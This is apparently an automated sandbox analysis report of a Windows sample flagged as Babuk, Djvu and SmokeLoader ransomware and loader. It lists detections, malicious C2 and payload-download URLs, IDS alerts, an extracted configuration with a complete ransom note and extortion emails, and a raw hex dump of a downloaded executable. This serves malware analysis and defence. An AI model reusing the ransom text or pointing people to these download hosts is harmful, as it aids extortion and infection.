Windows Analysis Report
XVM5nluelx.exe

Overview

General Information

Sample name:	XVM5nluelx.exe renamed because original name is a hash value
Original sample name:	b6e3a49931797e98183072cf02f58d26.exe
Analysis ID:	1447254
MD5:	b6e3a49931797e98183072cf02f58d26
SHA1:	6ef79d91ad2f98e869a729f56280c507298ba0f3
SHA256:	6f480d8bf96773150f0939254a71eb20e447d30580aab7abf171ecb0e0094698
Tags:	32exe
Infos:

Detection

Babuk, Djvu, SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Found ransom note / readme

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Babuk Ransomware

Yara detected Djvu Ransomware

Yara detected SmokeLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies existing user documents (likely ransomware behavior)

Query firmware table information (likely to detect VMs)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses cmd line tools excessively to alter registry or file data

Writes a notice file (html or txt) to demand a ransom

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Babuk	Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.	No Attribution	http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/ https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/ https://blog.morphisec.com/babuk-ransomware-variant-major-attack https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html https://chuongdong.com/reverse%20engineering/2021/01/16/BabukRansomware-v3/	https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk

Name	Description	Attribution	Blogpost URLs	Link
STOP, Djvu	STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.	No Attribution	https://angle.ankura.com/post/102het9/the-stop-ransomware-variant https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/ https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/	https://malpedia.caad.fkie.fraunhofer.de/details/win.stop

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: XVM5nluelx.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54e	Avira URL Cloud: Label: malware
Source: http://193.233.132.167/lend/jfesawdr.exe	Avira URL Cloud: Label: malware
Source: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54-D	Avira URL Cloud: Label: malware
Source: https://api.2ip.ua/q	Avira URL Cloud: Label: malware
Source: http://sdfjhuz.com/dl/buildz.exe	Avira URL Cloud: Label: malware
Source: https://nessotechbd.com/TEMPradius.exe	Avira URL Cloud: Label: malware
Source: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54KS	Avira URL Cloud: Label: malware
Source: http://cajgtus.com/test1/get.php	Avira URL Cloud: Label: malware
Source: https://www.safeautomationbd.com/klok.exe	Avira URL Cloud: Label: malware
Source: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54	Avira URL Cloud: Label: malware
Source: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54L	Avira URL Cloud: Label: malware
Source: https://api.2ip.ua/geo.jsondll	Avira URL Cloud: Label: malware
Source: https://api.2ip.ua/geo.jsonM	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\dejcbcc	Avira: detection malicious, Label: HEUR/AGEN.1311176
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Avira: detection malicious, Label: HEUR/AGEN.1311176
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Avira: detection malicious, Label: HEUR/AGEN.1311176

Found malware configuration

Source: 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Djvu {"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://cajgtus.com/files/1/build3.exe"], "C2 url": "http://cajgtus.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0871PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E
Source: 00000004.00000002.2342373288.0000000002E30000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://trad-einmyus.com/index.php", "http://tradein-myus.com/index.php", "http://trade-inmyus.com/index.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\dejcbcc

ReversingLabs: Detection: 31%

Multi AV Scanner detection for submitted file

Source: XVM5nluelx.exe

ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\dejcbcc	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: XVM5nluelx.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	9_2_0040E870
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040EA51 CryptDestroyHash,CryptReleaseContext,	9_2_0040EA51
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	9_2_0040EAA0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040EC68 CryptDestroyHash,CryptReleaseContext,	9_2_0040EC68
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	9_2_00410FC0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00411178 CryptDestroyHash,CryptReleaseContext,	9_2_00411178
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	14_2_0040E870
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040EA51 CryptDestroyHash,CryptReleaseContext,	14_2_0040EA51
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	14_2_0040EAA0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040EC68 CryptDestroyHash,CryptReleaseContext,	14_2_0040EC68
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	14_2_00410FC0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00411178 CryptDestroyHash,CryptReleaseContext,	14_2_00411178

Source: 33A3.exe, 00000010.00000002.3253450343.0000000000790000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_a21241c9-6

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Unpacked PE file: 9.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Unpacked PE file: 14.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Unpacked PE file: 16.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Unpacked PE file: 23.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Unpacked PE file: 26.2.33A3.exe.400000.0.unpack

Uses 32bit PE files

Source: XVM5nluelx.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	File created: C:\_readme.txt			Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	File created: C:\Users\user\_readme.txt			Jump to behavior

Source: C:\Users\user\Desktop\XVM5nluelx.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50431 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50438 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50441 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.174.152.66:443 -> 192.168.2.5:50442 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50451 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.16.114:443 -> 192.168.2.5:50454 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50461 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.5:50470 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:50474 version: TLS 1.2

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 33A3.exe, 33A3.exe, 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 33A3.exe, 00000008.00000002.2396691282.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000009.00000002.2422576325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000D.00000002.2433122057.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	9_2_00410160
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	9_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	9_2_0040FB98
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	14_2_00410160
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	14_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	14_2_0040FB98

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:57636 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:57637 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:57638 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:57639 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:57640 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:57641 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:57642 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:57643 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50429 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50430 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50432 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50434 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50436 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50437 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50439 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50444 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50445 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50446 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50447 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50448 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.5:50449 -> 187.170.192.109:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50450 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 187.170.192.109:80 -> 192.168.2.5:50449
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50452 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50453 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50455 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50456 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50457 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50458 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50459 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50460 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50462 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50463 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50464 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50465 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.5:50466 -> 91.92.253.69:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50467 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50469 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50471 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50473 -> 158.160.165.129:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.174.152.66 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 193.233.132.167 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.92.253.69 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.154.13.143 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.185.16.114 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.159.129.233 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 158.160.165.129 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.196.109.209 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 189.195.132.134 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://trad-einmyus.com/index.php
Source: Malware configuration extractor	URLs: http://tradein-myus.com/index.php
Source: Malware configuration extractor	URLs: http://trade-inmyus.com/index.php
Source: Malware configuration extractor	URLs: http://cajgtus.com/test1/get.php

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 24 May 2024 15:38:37 GMTContent-Type: application/octet-streamContent-Length: 735232Last-Modified: Fri, 24 May 2024 15:30:04 GMTConnection: closeETag: "6650b27c-b3800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bf fa 6e c5 fb 9b 00 96 fb 9b 00 96 fb 9b 00 96 f6 c9 df 96 e1 9b 00 96 f6 c9 e0 96 82 9b 00 96 f6 c9 e1 96 dc 9b 00 96 f2 e3 93 96 fc 9b 00 96 fb 9b 01 96 9f 9b 00 96 4e 05 e1 96 fa 9b 00 96 f6 c9 db 96 fa 9b 00 96 4e 05 de 96 fa 9b 00 96 52 69 63 68 fb 9b 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 6a c5 13 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e6 00 00 00 1e 90 02 00 00 00 00 97 3e 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 91 02 00 04 00 00 a6 d7 0b 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 